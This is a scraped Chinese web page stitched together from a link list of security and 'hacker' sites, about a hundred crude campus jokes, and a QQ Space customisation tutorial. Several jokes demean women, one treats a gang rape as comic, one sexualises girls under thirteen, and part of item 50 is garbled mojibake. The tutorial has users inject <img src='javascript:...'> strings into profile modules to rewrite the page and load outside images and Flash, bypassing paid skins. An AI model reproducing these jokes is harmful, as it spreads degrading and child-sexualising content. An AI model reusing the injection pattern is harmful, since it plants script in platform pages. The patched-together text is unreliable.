病毒防治官方网站   金山毒霸  瑞星反病毒  江民科技  趋势科技  安博士杀毒  光华反病毒  北信源  McAfee  熊猫卫士     冠群金辰-Kill  安铁诺防病毒  东方卫士  卡巴斯基  赛门铁克  木马克星         黑客安全资讯网站   安全中国  华夏黑客同盟  黑客基地  黑客动画吧  315安全网络  第八军团  黑鹰基地  校园黑客联盟   安全焦点  邪恶八进制信息安全团队  IT安全世界  桂林老兵  火狐技术联盟  小榕软件  BCT漏洞小组   天极网络安全  硅谷动力网络安全  IT世界病毒与安全  太平洋电脑安全  赛迪网黑客安全  51CTO安全频道   小凤居  天天安全网  黑白网络  红色黑客联盟  中国黑客联盟  黑软基地  砍客联盟   20CN安全小组   中国X黑客小组  岁月联盟  佛山网安  中国安全信息网  网侠联盟  黑色反击  阳光狮人  黑客百宝箱   21世纪安全  中国防黑网  中国漏洞网  小新技术网  中安网培  冰点极限&海洋顶瑞  中国网络安全协会   信诺克网络安全  情感网络联盟  中国安盟  肉鸡乐园  安全矩阵  黑客资源吧  潮阳人网站  灰鸽子   南域剑盟  黑客领域  红色特卫队  草盟网络  黑客中国  中国黑鹰联盟  绿色兵团  PC核儿安全  PcShare   影子鹰安全  补天网  中国鹰派  网嗅网络  蓝盾安全  中华安全 黑客城  左岸贵族  中国信息安全论坛   37.2℃网安基地  赏金猎手  中国红黑联盟基地  木马帝国  红客培训中心  特络纳 小刀会  电脑之家病毒   无忧黑客  黑豹网络  骇客基地  混客基地  菜鸟基地  动画基地  黑易  黑色海岸线  中国黑色同盟   国家网络应急中心  国家反计算机入侵防病毒中心  国家计算机网络入侵防范中心 国家病毒应急处理中心                       地方黑客网站   武汉黑客联盟  东北狼黑客帝国  华西黑客联盟  河南黑客联盟  新疆安全网  扬州黑客网  广西安全网       安全产品官方网站   天融信  思科(Cisco)  绿盟科技  东软  启明星辰  华为(3COM)  安氏中国  清华得实  网新易尚  深信服   理工先河  天元龙马  清华紫光比威  盖特佳  金诺网安  天网安全阵线  中网  飞塔  博威特  阿姆瑞特   卓尔  艾泰  锐捷  中怡数宽  网泰  汉景  中科网威  易安腾达  KFW傲盾  天盾  金盾  冰盾  网星           网络安全黑客杂志   黑客X档案  非安全黑客手册  黑客防线  计算机安全  信息网络安全       病毒/安全论坛推荐   安全中国论坛  百度病毒吧  SOHU社区安全论坛  金山毒霸论坛  瑞星卡卡社区  江民反病毒社区  焦点论坛   邪恶八进制讨论组  小榕论坛  我是网管论坛病毒木马  西祠安全论坛  看雪学院论坛         安全/个人博客推荐   流星  古典辣M  孤独剑客  中華攻客  小珂  冰血封情  马骏  SevenLine  Hacker57  冷漠男孩  雨夜   angel  Sniper  Super·Hei  啊D  非君子  绝情浪子  9xiao  老邪

1.周杰伦JJ骨折--------双截棍　　
　　　　 2.咬鹅（继“兔子急了也口交人”后，汉字结构之超级无敌至尊签名档！！！）　　　　
　　　　 3.差四百分上北大！　　　　
　　　　 4.男A 悲怆道：“复旦还有处 女吗？”
　　　　 男B含泪道：“有，但在女生肚子里……”　　　　
　　　　 5.2004年华人世界QQ上最精悍的骂人：
　　　　 A：USB! （翻译：U=YOU；**=傻*B，所以USB=你傻*B！）
　　　　 B：USB2.0！（翻译：2.0=2=two＝too（音同），所以USB2.0=你傻*B ， too！）
　　　　
　　　　 6.通知：好消息，好消息！今天中午在二食堂用餐的同学将有幸于下午四时到校医院接受免费的X光身体检查，本活动仅此一天，过期无效！（看清楚喽，可是免费地噢！：））。
　　　　 （下书小字：因食堂刘师傅工作疏忽，炒菜时不慎丢失小铁铲一把，刚饭勺四个，破抹布一条）（C_chairman）
　　　　
　　　　 7.我家的床板会唱歌！！！*^_^*
　　　　
　　　　 8.这个世界上本没有四六级，考的人的多了，也就有了四六级；也无所谓挂科，挂的人多了，也就有了挂科；这正如三峡大学，中国本没有三峡大学，来混日子的人多了，也就有了我们现在的三峡大学！
　　　　
　　　　 9.走廊里，一PPMM迎面向我走来：“塞，你真帅！”，我一个耳光飞过去骂道：“靠，废话！”
　　　　
　　　　 10.大学“混”之N重境界：
　　　　 一等：什幺？明天要考高数？？
　　　　 超等：什幺？下节课要考高数？？
　　　　 仙等：什幺？刚才考的是高数？？
　　　　 佛等：什幺？我们学过高数？？
　　　　 天外飞仙等：什幺？高数是

哪个国家的语言？要求必须过四级吗？？
　　　　
　　　　 11.课堂上，我问外教“Japanese”这个词是怎幺造出来的，外教起身拿起粉笔在黑板上写道：
　　　　 Japanese
　　　　 J unks（垃圾）
　　　　 A dults video（色*情电影）
　　　　 P rostitute（婊*子）
　　　　 A ss（蠢驴）
　　　　 N europathy（神经病）
　　　　 E vil（罪恶）
　　　　 S camp（流氓）
　　　　 E xcrement（大便）
　　　　
　　　　 12.孔子东游，遇两小儿便日！
　　　　
　　　　 13.你愿意和一个十全十美的女孩子在一起吗？——如果你认为胖也是一种美。（C_chairman）
　　　　
　　　　 14.一对恋人在自习室里一起学英文，突然女孩想放屁，但又不好意思，于是急中生智问男孩：“你想听布谷鸟是怎样叫的吗？”男孩点头。女孩模仿：“咕咕，咕咕。”乘机把屁放了。女孩问：“好听吗？”男孩答：“放屁声太大，没听到。”女孩很不好意思，遂指著书上的三个单词，男孩念到：“peace war found（屁是我放的）”。
　　　　
　　　　 15.台 湾一日不收复，我就一日不过英语四级！！！
　　　　
　　　　 16.清晨，金色的阳光照耀着大地。大学从床上爬起来，穿上裤子对我说：“你走，青春留下！”天啊，真不知道是我上了大学，还是大学上了我……
　　　　
　　　　 17.如果阿基米德说：“给我一根杠杆，我就可以翘起地球”，那幺资助我一部A片，我会对他说：“德兄，快过来帮我再搓两下，‘杠杆’马上就好了……”×_*（C_chairman）
　　　　
　　　　 18.夜，校园里两光棍儿坐在长椅上发痴……
　　　　 A：和女人结婚有什幺用？ B：有个鸟用！
　　　　 A：男人为什幺离婚？ B：不想干了！
　　　　
　　　　 19.妈妈说：“这个世界上没有一个人值得你为他哭，唯一一个值得你为他哭的人却永远不会让你哭！”
　　　　
　　　　 20.想当年，硬如铁，一夜三次都不用歇；现如今，软如泥，三月一次还得用手捏。
　　　　
　　　　 21.MM回到寝室便趴在枕头上嚎啕大哭，姐妹们见状赶忙围上来问何事。她说刚才和GG“ML”，因为她处 女膜长得靠里，所以没破，结果GG以为她不纯，竟然提出要分手。姐妹们听完后你一言我一语地安慰她……孰料MM转过头，一抹哭得红彤彤的眼睛愤愤道：“靠，他怎幺不说自己那个短~！！！”（我晕～～～）
　　　　
　　　　 22.老教授将课本往讲台上一摔，对着下面女生咆哮道：“我在上面这幺使劲，你们在下面却毫无反应，而且总想睡觉，难道我就这幺无能吗？！我给你们这幺多，你们接受的了吗？！！！”
　　　　
　　　　 23.熄灯后，男生宿舍集体高呼“来电！来电！”，结果5分钟后真的来电；
　　　　 接着，男生宿舍集体高喊“晚点熄灯！晚点熄灯！”然后真的11：50才熄灯；
　　　　 最后，男生宿舍集体高叫“女人！女人！……”
　　　　
　　　　 24.男叹：华工自古无娇娘，残花败柳排成行，怎配华工潘安子，只配烧饼武大郎。
　　　　 女怒：谁说华工无媚娘，小女便是女中皇，皮滑肉嫩屁股大，感情丰富性欲强！
　　　　 言毕，男口吐白沫数升，扑通倒地抽搐中……
　　　　
　　　　 25.据说，有名的科学家死了都要上天堂。一天，他们闲着无聊开始捉迷藏，约定：猫猫找到躲起来的人后，如果能叫出他的名字，就算赢。轮到爱因斯坦做猫了，他数玩数后，发现牛顿很嚣张地站在他面前一块1米×1米的地砖上，拽拽地看着他，爱因斯坦连忙大叫：“牛顿，我找到你了！”牛顿却说：“你输了，我不是牛顿”；旁人也帮他作证说不是。爱因斯坦很郁闷，这时牛顿说：“我是牛顿?每平方米，现在也叫帕斯卡……”
　　　　
　　　　 26.我：最近学什幺都没兴趣。
　　　　 友：估计你是想学‘性趣’了。
　　　　 我：倒～全是恐龙，何来性趣？班上有个女的，猛！超级背影杀手！从背后看，身材好，披肩长发，实有感觉；从侧面看，稍微有点失望；从正面看，靠！把老子1岁吃的米羹都呕出来了，她的脸就像烤熟的地瓜，你使劲往地上摔稀烂，然后上去狠狠踩两脚，再在上面撒点芝麻……
　　　　 友：没那幺夸张吧？关了灯都是一样的啊~~~
　　　　 我：我给你讲，绝对不可能！因为关灯前你就得被她的模样吓死！！！
　　　　 友：关灯前带墨镜，关灯后再摘下来嘛~~~
　　　　 （巨寒的来了~~~）
　　　　 我：真正的恐龙——关了灯都是夜光的！！！
　　　　
　　　　 27.i love three things:the sun ，the moon and you ;
　　　　 the sun for the day ;
　　　　 the moon for the night ;
　　　　 and you for ever .
　　　　
　　　　 28.有一天，我梦见自己在考试，结果醒来一看真的在考试……（我倒～～～）
　　　　
　　　　 29.对单身妹妹，我始终争取；对有夫之妇，我从未放弃；
　　　　 对十三岁以上女孩，我注意发掘；对小于十三的，要有战略性眼光；
　　　　 对于靓女，争取来多夜情；对于恐龙，争取做第一个；
　　　　 对于辣妹，要彻底征服她；对于小家碧玉，要培养成淫娃。
　　　　
　　　　 30.如果非得用爱天涯，爱生活，那幺我想用爱天涯，爱生活女人，因为那样她们抗不抗“日”，我都高兴！^_^
　　　　 31.我一直不明白，有了（北京）工大的女生，我们还要造原子弹做什幺？？
32.夜半，某女回宿舍，在门口时被几个暴徒围住。危机时看门大妈挺身而出，使得少女成功脱身但却自遭轮 J。第二天，校长亲自到医院看望大妈，幷对大妈行为表示感激，孰料大妈言：“没事儿，当时俺啥也没想，只是想这点好事可不能全便宜了那小骚娘们儿！”
　　　　
　　　　 33.南大富婆最有钱，专门修理小青年。东南学姐身子软，撩起裙子傍大款。
　　　　 南航女生不会动，轻轻一插就喊痛。理工妹子心肠好，月经来了都让搞。
　　　　 河海姑娘没文化，床上功夫传天下。南工小姐个子矮，乐于给人做二奶。
　　　　 师大小妮有礼貌，随身带着避孕套。南邮姊妹点子多，五元一晚随你摸。
　　　　 南艺婊 子有味道，痛了累了她还笑。财经大姐最厉害，公共场所敢做爱！
　　　　
　　　　 34.我导师说：“事业不成功，就用小灵通！”
　　　　
　　　　 35.交大官方演示文稿，2004年

秋季，华东师大大部分专业将正式搬迁闵行。这个消息已在交大学生中传得沸沸扬扬，一些被采访的大四男生纷纷为错失良机而深感惋惜，他们希望学弟学妹把握良机；另外一些大四男生说会考虑考研。一名不愿透露姓名的教务人员称，因为这一消息，今年的考研形势会愈发严峻，未来几年的考分也将会持续走高。低年级的交大男生已经开始摩拳擦掌，他们情绪十分高昂，一位男生对记者说：“这的确是个好消息，这一新鲜力量的注入会极大程度的释放本校男生的潜力，会带动新一轮的学术繁荣。”再看看华师大女生的看法：大多数女孩表示，校区搬到这幺偏的地方多少会给生活带来不便，但那里的男生还是值得期待的；她们将会摆脱目前“粥多僧少”的尴尬局面，寻找到更灿烂美好的明天；一女生还对着摄像机哼起了小调“更多选择，更多欢笑，就在新校区！”华师大的男生对此消息似乎幷无太大反响，多数男生表示此次搬迁不会给他们的大学生活带来压力；一些男生表示，整天被围在女生堆里幷不像人们想象中的那样幸福。这一消息传出，交大女生似乎成了间接受害方，由于资源稀缺而引起的价位虚高将会被无情的打破，她们不得不开始考虑对男友好一些了。总之，搬迁计划已经开始引起反应，这将带来一系列的涟漪效应，本报将对此事做全面的追踪报道和进一步深入分析。
　　　　
　　　　 36.内事决不问老婆，外事决不问google！
　　　　
　　　　 37.十年辛苦进华工，当个和尚撞大钟，恍恍惚惚大学梦，事业爱情两场空！：（
　　　　
　　　　 38.（河北建院）波涛汹涌，奶尽天下寒士；私处激荡，爽歪世上寡人！
　　　　
　　　　 39.您看看这头驴怎幺样？
　　先看看品种——北大的，一百多年老字号了；
　　再看看皮毛——化学院的，除了当试管刷，做什幺都成；
　　再看看这身子骨——壮的跟骡子似的，背两桶液氮都成；
　　您再看看这牙口——年轻，把眼睛蒙上，一天十几个小时的离心机都没有问题；
　　总之，这驴没什幺问题，少说也能干十年八年的。出个价吧，合适就卖了！
　　　　
　　　　 40.上联：回眸一笑，刺激美眉尽尖叫；下联：赏镜中人，感动自己被勾魂；横批：帅哦帅噢！
　　　　
　　　　 41.（生物研究工程系）一桩离婚往往能带来两桩结婚，这叫分裂生殖，是低等动物常见的生殖方式。
　　　　
　　　　 42.报纸说吸烟有害健康，所以我把烟戒了；报纸又说喝酒损害肝脏，所以我又把酒戒了；报纸又说做爱有害身体，KAO，这下我TMD把报纸给戒了。
　　　　
　　　　 43.女生罩杯的英文含义：
　　　　 A 是airport
　　　　 B 是barely there
　　　　 C 是can do
　　　　 D 是damn good
　　　　 E 是extensive
　　　　 F 是fantasy～
　　　　
　　　　 44.女朋友结婚了，我很痛苦，因为我不是新郎，而是伴郎！
　　　　
　　　　 45.很多人都问我为何这幺有品味？其实我哪里有什幺秘诀呢，我只是把别人学习的时间都花在了喝咖啡上。
　　
　　　　 46.导师：医学上把痛分为12级。第1级是被蚊子叮咬时的痛，第12级，也就是最痛的一级——分娩时的痛苦。
　　学生：那有没有第13级的痛？
　　导师：笨，那不就分娩时被蚊子叮到了嘛！
　　
　　　　 47.女人无所谓正派，正派是因为受到的引诱不够；男人无所谓忠诚，忠诚是因为背叛的筹码太低。
　　　　
　　　　 48.男孩，如果你不能为心爱的女孩穿上嫁衣，那幺请停下你解衣扣的手……
　　　　
　　　　 49.Oh ， John . Don’t Stop touching me.
　　　　 Oh ， John . Don’t Stop touching.
　　　　 Oh ， John . Don’t Stop.
　　　　 Oh ， John . Don’t.
　　　　 Oh ， John.
　　　　 Oh
　　　　 Oh ， John.
　　　　 Oh ， John . Don’t.
　　　　 Oh ， John . Don’t stop.
　　　　 Oh ， John . Don’t stop touching.
　　　　 Oh ， John . Don’t stop touching me.
　　　　
　　　　 50.大一到大四的X个定律（签名档荟萃篇）：
　　　　 铃声定律：大一（上学期）是上课铃响的时候已经在教室里面了；大一（下学期）是上课铃响的时候往教室疯跑；大二是上课铃响的时候还在宿舍洗脸；大三是上课铃响的时候正在往校外走；大四的时候压根就不在学校，所以听不见上课铃。
　　　　 睡觉定律：大一是晚上熄灯后准时上床睡觉，大二是晚上熄灯后还没有睡觉，大三是上课在老师眼皮底下睡觉；大四是上课时依然在宿舍睡觉。
　　　　 饭堂定律：大一发现有条虫，整碗饭都倒了；大二发现有条虫，把虫挑出来继续裕淮笕⑾钟刑醭妫弊雒挥谐嬉黄鸪粤耍淮笏姆⑾置挥谐妫ǹ挂椋┟怀嬲Τ缘孟路梗慷裂惺保⑾忠恢殖妫ㄌ酒┭教ヒ唬欢敛┦保⑾种挥谐妫ǜ锌┭；锸秤指纳屏恕?
　　　　 走路定律：大一是走在人行行道的，大二是走在马路边上的，大三是走在马路中央的，大四是走在马路逆行线的。
　　　　 眼神定律（看MM的）：大一是害羞的，大二是直直的，大三是Y 荡的，大四是还要跑回去看的。
　　　　 报到定律：大一是提前几天到的，大二是准时到的，大三是迟几天到的，大四是不去注册的。
　　　　 大学四动（追MM的）：大一按兵不动，大二蠢蠢欲动，大三全面出动，大四个个反动。
　　　　 大学四草：大一兔子不吃窝边草，大二好马不吃回头草，大三疾风知劲草，大四天涯何处无芳草。
　　　　 女生定律：大一女生娇，大二女生俏，大三女生满街跑，大四女生没人要。
51.华工的男生就像华工的树，华工的女生就像华工的路灯；一棵树不能拥有几盏路灯，但一盏路灯却能照亮几棵树。
　　　　
　　　　 52.香荷碧水动风凉，水动风凉夏日长。长日夏凉风动水，凉风动水碧荷香。
　　　　
　　　　 53.男：我真的爱你，求你做我的女朋友吧！
　　　　 女：可是我对你根本就没感觉！！
　　　　 男：那好，你告诉我我哪一点不好，我改！！！
　　　　 女：那你先告诉我我哪一点好，我～改！！！！
　　　　
　　　　 54.南京大学，阳光灿烂，走到里面，破破烂烂，
　　　　 十个教授，九个笨蛋，还有一个，神经错乱，
　　　　 教出学生，都成傻蛋，勤俭好读，越读越烂，
　　　　 平时上课，懒懒散散，临近考试，挑灯夜战，
　　　　 成绩一出，全是鸭蛋；干部选举，关系至上，
　　　　 请客送礼，成为时尚，礼轻情重，不必推让，
　　　　 自由恋爱，好聚好散，成双成对，十分浪漫，
　　　　 男生成群，长象凶悍，失恋跳楼，年年不断；
　　　　 寥寥才子，就此绝望，痛心疾首，宁缺毋滥！
　　　　
　　　　 55.我喜欢孩子，更喜欢造孩子的过程！但我~
　　　　
　　　　 56.生日派对上大家分蛋糕，蛋糕一块上有个“生”字，另一块上有个“日”字，碰巧还有一男一女没有

分到。这时，只听男孩对女孩说：“我负责‘日’，你负责‘生’……”
　　　　 57.网络就像是监狱，本来偷了个钱包进去的，出来以后杀人放火全会了。
　　　　
　　　　 58.因犯高考录取罪，被判有期徒刑四年，现在就要刑满释放回家。Oh ， My GOD！我又失业了。
　　　　
　　　　 59.校长说：“大学里谈恋爱那是给别人养老婆。”
　　　　 老师听后说：“要知道，你们以后的老婆这时候也正被别人养着。”
　　　　 所以，我现在不想找老婆！！@_@
　　　　
　　　　 60.成都理工男女比例严重失衡，男生被“性”憋的整天挖空心思地想找机会和女生接近。一天深夜电影散场，一MM焦急地徘徊在车站牌前……正好工程系一GG骑车路过，便热情地说：“我送你回去吧。”MM见这GG眼熟，知道是自己学校的，便客气了一番。GG自行车没后架，便很不好意思地说：“你坐前面好吗？”MM一看也确实没什幺办法便点头答应。一路上，GG非常兴奋！！~~~很快就把MM带到了女生宿舍楼前。MM下车回过头来正想说点客气话感谢GG，突然发现GG的自行车竟然没有前大梁，MM十分惊诧，目瞪口呆地问道：“我是坐哪儿回来的呢？？？”
　　　　
　　　　 61.将食，涨，如厕，陷而卒。（《左传》）
　　　　
　　　　 62.想你的时候，有种柔软的东西就渐渐的硬了……*^_^*
　　　　
　　　　 63.世界上的每一个人都是被上帝咬过一口的苹果，都是有缺陷的人。有的人缺陷比较大，是因为上帝特别偏爱他的芬芳。（大家仔细品品）
　　　　
　　　　 64. 问：“如果把少林寺和尼姑庵合幷后会怎样？”
　　答：“会有流血事件发生，但是没有人员伤亡！”
　　
　　　　 65.关起门来“搞三讲”，认认真真走过场；腐败分子前三排，枪毙的都在主席台。
　　
　　　　 66.女人不喜欢郭靖却喜欢杨康，但到最后都被很像杨康的欧阳克弄到手，她们的下场就是要幺变成了李莫愁，要幺就变成韦春花。
　　　　
　　　　 67.哥几个趴在窗台边看楼下路过的MM。碰巧寝室老马喜欢的一个MM走了过来，大家赶紧喊老马过来，只听老马感慨道：“哎～我爱的女人已在别人胯下！！”
　　　　
　　　　 68.有个人姓卞。比他年纪大的人叫他小卞，比他年纪小的人叫他大卞，他的秘书叫卞秘，我们这里是广东，他老婆就叫卞太……
　　　　
　　　　 69.网友网友，网得老子一无所有！网恋网恋，网得老子总是失恋！
　　　　 网吧网吧，网得老子一身伤疤！网络网络，网得老子心碎堕落！
　　　　
　　　　 70.上帝把所有人都骗了——因为地狱才是最美的。佛知道真相，所以佛说：“我不入地狱，谁入地狱。”
71.一天，缩缩和他女友在河边散步，孰料女友不慎掉进河里，他不会游泳，所以在岸边哭了起来。恍若童话中，河仙这时出现了，河仙问明事由后，便跳下河去抱李嘉欣上来问这是不是他的女友，他连忙点头称是。河仙怒道：“老仙我很生气，后果很严重！”。缩缩委屈道：“你送三把斧头给人的故事我小学时就学过，刚才我要说不是呢，下次你还会抱陈慧林上来，到最后你再把我女友抱上来幷将她们三个全送给我……我只是一个穷学生，没有钱，还靠助学贷款交的学费，怎幺可能养得起这三个女人呢？所以我只能说是了……”
　　　　
　　　　 72.（2004年华人世界最短的笑话）精子曰：喔，SHIT！
　　　　
　　　　 73.——别看资料！
　　　　 ——那看啥？
　　　　 ——看聊效啊！
　　　　
　　　　 74.女：唉呀，你不就是五道口理工学院那个大帅哥吗？怎幺跑这儿做生意来了？
　　Me：嗨～前些日子我们学院闹了阵住房紧张，然后又说不发网费了，接着食堂大米跟煎饼鶏蛋一个劲儿地涨价，后来还风传什幺洗澡计时、停发补注……我穷得实在混不下去了，所以退学来这儿

卖光盘了。
　　美女：你一走，理工学院可就再没这幺帅的人了啊……不过帅就是帅，连你卖盘时都这幺英俊潇洒^_^
　　Me：姐姐，你就别套近乎了！熟归熟，这盘法国A片的DVD上货价就是贵，一定要15块钱一张，，真的不能再便宜了……
　　
　　　　 75. 某女在“SOHU”BBS上调查，她问第一个人：“你每天来这里都做什幺？”那人答：“除了发贴就是骂那个S*B总版主了。”她又问另一个，另一个答道：“除了发贴就是骂那个S*B总版主了。”……一直问了99个，答案都是如此一致。当问到第100个时，他回答说：“我每天来就是为了发贴。”女生很奇怪地问：“那你怎幺不骂总版主呢？”第100个人没好气地说：“我***就是那个S*B总版主！”　
　　　　
　　　　 76.每当遇到困难的时候，我都会掏出钱包看看女友照片，然后对自己说：“有什幺好怕的？不要灰心，难道还有什幺比她更难对付的吗？”
　　　　
　　　　 77.陈大常、王大常，都无所谓，他偏偏姓朱。
　　　 　陈德开、王德开，都无所谓，她偏偏姓张。
　　　　 陈开凤、王开凤，都无所谓，她偏偏姓夏。
　　　　
　　　　 78.恐龙说：“遇到色狼，不慌不忙；遇到禽兽，慢慢享受……”
　　　　
　　　　 79.我们系有30个女生：其中三分之一你看到了吃不下饭；另外三分之一你看到了睡不着觉；还有三分之一从来没有人见过，因为看见的都吓死了！
　　　　
　　　　 80.我以为我很成熟实际上很幼稚；我以为我够奸诈实际上比我奸诈的人彼彼皆是；我以为劳动可以创造财富实际上不劳动的创造的财富要更多；我以为爱情是我最终的目的实际上人生才刚刚开始；我以为我长得还不错实际上我脸上有的五官猪也有；我以为我在自嘲实际上我是如此之桀骜……
　　　　
　　　　 81.帅到无边心是岸，拽临绝顶我为峰。
　　　　
　　　　 82.我最喜欢的日子：1月31日；我最讨厌的日子：12月1日。（只有YY的人才理解：））
　　　　
　　　　 83.一头犁牛半块田，收也凭天，荒也凭天；
　　　　 粗茶淡饭饱三餐，早也香甜，晚也香甜；
　　　　 布衣得暖胜丝棉，长也可穿，短也可穿；
　　　　 草舍茅屋有几间，行也安然，待也安然；
　　　　 雨过天晴驾小船，鱼在一边，酒在一边；
　　　　 夜归儿女话灯前，今也有言，古也有言；
　　　　 日上三竿我独眠，谁是神仙，我是神仙！
　　　　
　　　　 84.你们这些小辈在论坛里唧唧喳喳的闹什幺？老子出道时，你们还是液体那！（狠人啊）
　　　　
　　　　 85.我的天真太早遗失，而我的成熟又蹒跚不至……
　　　　
　　　　 86. 我心爱的卡瓦伊MM：风华绝代万人惊艶羞花闭月沉鱼落雁落落大方八面玲珑；
　　　　 冰雪聪明博晓古今善解人意通情达理内外有方持家有道。
　　　　
　　　　 87.什幺是骄傲？牛*B呗！
　　　　 什幺是谦虚？装*B呗！
　　　　 什幺是勤俭？扣*B呗！
　　　　 什幺是奉献？傻*B呗！
　　　　 什幺是主动？贱*B呗！
　　　　 什幺是舒服？操*B呗！
　　　　 什幺是脏话？操*他妈了个B呗！！！
　　　　
　　　　 88.课间被老师揪住背单词。“A、C、D……”老师问为什幺没有“B”，我说妈妈说那是脏话，老师听了哈哈大笑拍着我的脑袋说：“哎，这是英文字母的‘B’，不是你妈‘B’的‘B’！”
　　　　
　　　　 89.不 矢口 亻十 幺 日寸 候 ， 亻奄 口斤 言兑 言仑 土云 有 辶寸 氵虑 敏 感 字 节 白勺 言兑 氵去 ， 于 是 ， 亻奄 学 会 了 扌斥 字 ， 后 来 ， 亻奄 米青 礻申 分 歹刂 了 。
　　　　
　　　　 90.一大学生不幸被敌人抓住，敌人把他绑在了电线杆上，然后问他：“说，你是哪里的？不说就电死你！！！”这个大学生回了敌人一句话，结果被电死了……
　　　　 他说：“我是电大的！”
　　　　
　　　　 91.俺站在校园里向全世界高喊：“俺要早恋……恋……恋……”。这时一个五岁左右，长相酷肖俺的小男孩跑了过来，拉着俺的裤脚说：“爹，俺娘说你别做梦了，赶快回去帮她买瓶酱油，她做饭走不开。”
　　　　
　　　　 92.脱了衣服我是禽兽，穿上衣服我是衣冠禽兽。
　　　　
　　　　 93.偶到食堂打饭插队，后一猛女喊：“你挤个J*B啊！”吾大窘曰：“一个……”
　　　　
　　　　 94.湖大门口遇一“鶏”，“鶏”问：老弟，caobi不？曰：没钱。“鶏”：你们学校饭票就行！！！
　　　　
　　　　 95.（传奇）一女法师改名为——挺着胸部甩电；一女道士改名为——用胸部引怪；于是乎呢，我把自己武士的名改为——实插七小时。
　　　　
　　　　 96.春天，我在学校操场上挖了一个坑，然后把我女朋友埋下去，这样到了秋天，我就会有很多很多女朋友啦：）～～～
　　　　
　　　　 97.我校现状：
　　　　 （1）高中的校园规模，中专的管理模式，初中的生源底子，小学的教育模式，幼儿的师资力量。
　　　　 （2）学生是骗来的，老师是抢来的，教室是租来的，宿舍是借来的。
　　　　 （3）学校好似妓 院，教室就像猪圈，人在课堂心在外，上课不如谈恋爱。
　　　　 （4）学费全国最贵，上课一排全睡，考试基本不会，成绩分数个位；
　　　　 反恐如痴如醉，A片看到乏味，逃课成群结队，上街花钱干脆；
　　　　 打饭从不排队，白酒两瓶不醉，晚上点灯开会，短信发到欠费；
　　　　 抽烟搓麻全会，恋爱谈到反胃，杀人放在衣柜，云南大学万岁！！！
　　　　
　　　　 98.食堂刘老师傅对窗口排队的一MM柔媚道：“呐～油条先夹住，豆浆马上来~~~”
　　　　
　　　　 99.风景如画的校园里，有一群美丽的少女，她们不思进取，生活奢靡，“月初是皇帝，月末是乞丐”，每月都把爹妈寄给她们的“银子”花得干干净净……所以，我们尊称这些美丽的少女们为——“月光”女神。

装扮空间——自定义——新建模块
输入新模块名字，比如鼠标，背景等。提交。
然后出现新的对话框，把代码写入评论一栏，其他栏清空。提交。
完成后，保存。

1.qq空间皮肤背景代码：QQ空间不用Q币更换主页皮肤方法
下面是更换QQ皮肤的新代码（2005年11月29日测试可用）：
<img src="javascript:document.getElementById('Mlogo').style.background='url(http://顶部一条图片地址)';document.getElementById('all').style.background='url(http://背景图片地址)';">

如果你不想改顶部图片条的话只要这样就够了：
<img src="javascript:document.getElementById('all').style.background='url(http://背景图片地址)';">

设置顶部图片条透明度：
<img src="javascript:Mlogo.style.filter='alpha(opacity=30)';">
把30用0-100中喜欢的不透明度代替。100为不透明，0为完全看不见的透明。

我们只要把上面代码中的两处“图片地址”，更改你自己喜欢的皮肤地址，就可以了，同样代码都是加到评论里，（提醒：代码中有两处地址，都要改， 那些代码是要放在新建的模块（当然，也可以在你原有的新建模块里增加一个项目）里的评论里的（自定义－个性模块-－新建模块－板块名称－网页对话筐－评论－（图片栏和地址栏的http要删除） －点个保存方式－保存－关于做出来得模块，我们要隐藏它）
那么要怎么样才知道皮肤的网络地址呢？

首先 我们先进入：QQ个人空间—装扮空间－皮肤－看到自己自己喜欢的皮肤点右键－属性－可以看到皮肤地址（请注意那并不是放入皮肤代码的皮肤网络地址）

例如，网络位置：http://imgcache.qq.com/qzone/item/orig/2/50.gif

比如上图－现在：我们右键点皮肤小图片的，属性，看地址那拦，对照一下和皮肤网络位置的地址有什么区别，嘻嘻～看出来了吧，pre/2/50.gif和orig/2/50.gif不一样哦，也就是说只要我们把装扮空间里的皮肤地址里的pre—改为orig

例如：http://imgcache.qq.com/qzone/item/pre/12/844.gif （商场装扮空间里的皮肤展示的地址）
改为：http://imgcache.qq.com/qzone/item/orig/12/844.gif（实际的皮肤图片地址）

注意：由于腾讯QQ空间方面做了限制，通过以上方法得到的皮肤图片地址如果直接用到代码里面是无法显示的。

免费的东西难道又没得用了？有一个方法，如果我们把皮肤图片文件下载下来，上传到别的网页空间再调出来，是可以显示的。例如上面这个，上传到本站，得到地址：http://www.qqjia.com/learn/qq2005/q-zone/bk.jpg，所以，代码就是：

<img src="javascript:document.getElementById('all').style.background='url(http://www.qqjia.com/learn/qq2005/q-zone/bk.jpg)';">

你可以用以上方法下载了QQ空间里的图片文件后上传到免费的网页空间去（例如论坛、博客等）得到图片文件的地址。当然，你也可以用你在网页上看到的任何图片做皮肤，看到喜欢的图片点右键－属性－地址－复制，OK，HOHO，喜欢什么皮肤想换就换，很简单吧～
2.QQ空间代码之QQ空间导航代码
什么是QQ空间导航？看右边这个图，就是“主页”、“日志”这些东西，每个人的都一样，是不是很没有个性啊？好的，就改改他。先看这个自定义字的导航代码：

<img src="javascript:bt_1.innerText='主 页';bt_2.innerText='日记簿';bt_3.innerText='音乐厅';bt_4.innerText='留言簿';bt_5.innerText='相册集';bt_6.innerText='过家家';bt_7.innerText='主人家';bt_8.innerText='谁踩我';">

这代码里面的中文字可以随便改，但是不要超过3个中文字，多了就不好看了。
是不是觉得文字的还不过瘾，好，下面来看FLASH的。先来看全屏显示的FLASH的代码：

<img src="javascript:document.getElementById('Mlogo').innerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'地址\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';">

这个代码里“WIDTH=\'925\' HEIGHT=\'655\'”是FLASH的宽度和高度，可根据FLASH的大小和位置以及在QQ空间出现的地方调整，“\'地址\'”就是FLASH导航文件的地址，这个地址去那里找呢？网上有很多，我找了一个做示范，看这个地址：http://www.qqjia.com/learn/qq2005/q-zone/jia1.swf，那么代码就是：

<img src="javascript:document.getElementById('Mlogo').innerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'http://www.qqjia.com/learn/qq2005/q-zone/jia1.swf\';;;;;;;; quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';">

上面的这个导航是放在右边的，如果是放在上面的导航条，例如这个：http://www.qqjia.com/learn/qq2005/q-zone/jia2.swf，那 HEIGHT 选65就可以了，代码为：

